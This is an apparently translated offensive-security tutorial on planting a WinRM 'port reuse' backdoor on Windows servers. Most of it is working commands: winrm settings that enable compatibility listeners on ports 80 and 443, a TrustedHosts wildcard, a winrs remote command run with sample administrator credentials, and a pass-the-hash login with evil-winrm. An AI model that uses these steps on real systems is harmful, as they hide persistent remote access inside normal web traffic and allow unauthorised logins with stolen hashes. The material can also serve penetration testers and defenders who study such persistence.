Title: Port reuse backdoor summary

WinRM implements port multiplexing

This attack method requires an account and password. If you obtain hash, you can also use evil-winrm to achieve hash login.

Service Introduction

The full name of WinRM is Windows Remote Management, which is part of Microsoft's server hardware management function, and can manage local or remote servers. The WinRM service allows administrators to log in to the Windows operating system remotely and obtain an interactive command line shell similar to Telnet, while the underlying communication protocol uses HTTP.

Backdoor Application

In the windows2012 server, winrm is started by default, port 5985 is enabled, and the service needs to be manually enabled in the 2008 system.

winrm quickconfig -q After startup, the firewall will also release the port

Set to enable httplistener listening coexistence

winrm set winrm/config/service @{EnableCompatibilityHttpListener='true'} //80

winrm set winrm/config/service @{EnableCompatibilityHttpsListener='true'} //443

Modify the listening port to 80/443

winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port='80'}

winrm set winrm/config/Listener?Address=*+Transport=HTTPS @{Port='443'}

Local connection also requires turning on WinRM service and then setting up a trusted host.

winrm quickconfig -q

winrm set winrm/config/Client @{TrustedHosts='*'}

winrs -r:http://172.16.142.151:5985 -u:administrator -p:admin123 'whoami'

WinRM PTH

Implement pth using evil-winrm under mac

sudo gem install evil-winrm

evil-winrm -i 172.16.142.151 -u administrator -H 8842